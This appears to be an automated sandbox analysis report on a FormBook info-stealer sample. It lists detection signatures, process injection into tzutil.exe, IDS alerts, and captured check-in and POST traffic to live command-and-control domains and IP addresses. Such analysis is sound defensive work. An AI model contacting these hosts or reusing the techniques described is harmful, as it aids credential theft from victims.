
Windows Analysis Report
ORDER-401.exe

Overview

General Information

Sample name: ORDER-401.exe
Analysis ID: 1574061
MD5: 3dfa099ee923a3f449f97ca8f522f703
SHA1: b2aece2499d5d90eb59d7e0d8a908c162d7e70f1
SHA256: 756abd1273244ba91c1b9bd7bb86182e9012e12f2599cb715f9757cc34e3a81e
Tags: exe user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ORDER-401.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\ORDER-401.exe" MD5: 3DFA099EE923A3F449F97CA8F522F703)
    • ORDER-401.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\ORDER-401.exe" MD5: 3DFA099EE923A3F449F97CA8F522F703)
      • PcwrDoOfOMD.exe (PID: 6036 cmdline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 6636 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • PcwrDoOfOMD.exe (PID: 5240 cmdline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4884 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
4.2.ORDER-401.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.ORDER-401.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T21:38:10.419837+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49714 | 161.97.142.144 | 80 | TCP
2024-12-12T21:38:36.355592+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49718 | 107.155.56.30 | 80 | TCP
2024-12-12T21:38:52.357197+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49722 | 18.139.62.226 | 80 | TCP
2024-12-12T21:39:15.387860+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49726 | 209.74.77.107 | 80 | TCP
2024-12-12T21:39:30.889518+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49730 | 154.205.159.116 | 80 | TCP
2024-12-12T21:39:45.713532+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49734 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T21:38:10.419837+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 161.97.142.144 | 80 | TCP
2024-12-12T21:38:36.355592+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 107.155.56.30 | 80 | TCP
2024-12-12T21:38:52.357197+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49722 | 18.139.62.226 | 80 | TCP
2024-12-12T21:39:15.387860+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49726 | 209.74.77.107 | 80 | TCP
2024-12-12T21:39:30.889518+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49730 | 154.205.159.116 | 80 | TCP
2024-12-12T21:39:45.713532+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49734 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T21:38:28.268922+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 107.155.56.30 | 80 | TCP
2024-12-12T21:38:30.964806+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 107.155.56.30 | 80 | TCP
2024-12-12T21:38:33.628273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 107.155.56.30 | 80 | TCP
2024-12-12T21:38:44.284528+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 18.139.62.226 | 80 | TCP
2024-12-12T21:38:46.956483+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 18.139.62.226 | 80 | TCP
2024-12-12T21:38:49.641750+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49721 | 18.139.62.226 | 80 | TCP
2024-12-12T21:39:07.390754+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49723 | 209.74.77.107 | 80 | TCP
2024-12-12T21:39:10.051965+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49724 | 209.74.77.107 | 80 | TCP
2024-12-12T21:39:12.784154+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49725 | 209.74.77.107 | 80 | TCP
2024-12-12T21:39:22.706760+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49727 | 154.205.159.116 | 80 | TCP
2024-12-12T21:39:25.378330+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49728 | 154.205.159.116 | 80 | TCP
2024-12-12T21:39:28.050478+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49729 | 154.205.159.116 | 80 | TCP
2024-12-12T21:39:37.625829+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49731 | 3.33.130.190 | 80 | TCP
2024-12-12T21:39:40.722439+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49732 | 3.33.130.190 | 80 | TCP
2024-12-12T21:39:42.967531+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49733 | 3.33.130.190 | 80 | TCP
2024-12-12T21:39:53.867876+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 38.46.13.54 | 80 | TCP

                AV Detection

Source: http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU | Avira URL Cloud: Label: malware
Source: http://www.taxiquynhonnew.click/y49d/ | Avira URL Cloud: Label: malware
Source: https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU | Avira URL Cloud: Label: malware
Source: ORDER-401.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORDER-401.exe | Joe Sandbox ML: detected
Source: ORDER-401.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORDER-401.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tzutil.pdbGCTL | source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: PcwrDoOfOMD.exe, 00000007.00000000.2018936585.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167501370.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP | source: ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ORDER-401.exe, ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: tzutil.pdb | source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_028CC9D0 FindFirstFileW,FindNextFileW,FindClose, | 8_2_028CC9D0
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then xor eax, eax | 8_2_028B9F80
Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_02FD04D0

                Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 154.205.159.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49718 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49718 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 154.205.159.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 107.155.56.30:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 154.205.159.116:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49726 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49726 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49714 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49714 -> 161.97.142.144:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49734 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49734 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49722 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49722 -> 18.139.62.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 38.46.13.54:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49730 -> 154.205.159.116:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49730 -> 154.205.159.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 107.155.56.30:80
Source: DNS query: www.070001325.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144 161.97.142.144
Source: Joe Sandbox View | IP Address: 209.74.77.107 209.74.77.107
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Content-Encoding: gzip
    Content-Type: text/html; charset=UTF-8
    Date: Thu, 12 Dec 2024 20:39:22 GMT
    Server: nginx
    Vary: Accept-Encoding
    Content-Length: 44
    Connection: close
    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
    Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 200 OK
    Content-Encoding: gzip
    Content-Type: text/html; charset=UTF-8
    Date: Thu, 12 Dec 2024 20:39:25 GMT
    Server: nginx
    Vary: Accept-Encoding
    Content-Length: 44
    Connection: close
    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
    Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic | HTTP traffic detected:
    GET /gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.070001325.xyz
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /2gcl/?84EhVDY=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmW5Tm5D5tQBI3B1+VDfuWeAsbbOCckpfS6ddEbXQs3erVRA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.expancz.top
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.taxiquynhonnew.click
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /a6qk/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsS95xRIWFjwm0Cd59BaWixf9mBuP0aMIhNaQDKqAQJAIXVg== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.learnwithus.site
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.jijievo.site
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.likesharecomment.net
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.070001325.xyz
Source: global traffic | DNS traffic detected: DNS query: www.expancz.top
Source: global traffic | DNS traffic detected: DNS query: www.taxiquynhonnew.click
Source: global traffic | DNS traffic detected: DNS query: www.epitomize.shop
Source: global traffic | DNS traffic detected: DNS query: www.learnwithus.site
Source: global traffic | DNS traffic detected: DNS query: www.jijievo.site
Source: global traffic | DNS traffic detected: DNS query: www.likesharecomment.net
Source: global traffic | DNS traffic detected: DNS query: www.397256.pink
Source: unknown | HTTP traffic detected:
    POST /2gcl/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Host: www.expancz.top
    Origin: http://www.expancz.top
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 208
    Cache-Control: max-age=0
    Referer: http://www.expancz.top/2gcl/
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
    Data Ascii: 84EhVDY=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSS5dcwm1gKZY+55Vn7TGwjnes+geUC1tgvUoDT0=
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 12 Dec 2024 20:38:10 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 2966
    Connection: close
    Vary: Accept-Encoding
    ETag: "66cce1df-b96"
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 20:39:07 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 20:39:09 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 20:39:12 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 20:39:15 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ORDER-401.exe | String found in binary or memory: http://www.elderscrolls.com/skyrim/characterK
                Source: ORDER-401.exe | String found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                Source: ORDER-401.exe | String found in binary or memory: http://www.elderscrolls.com/skyrim/player
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.likesharecomment.net
                Source: PcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.likesharecomment.net/nqht/
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
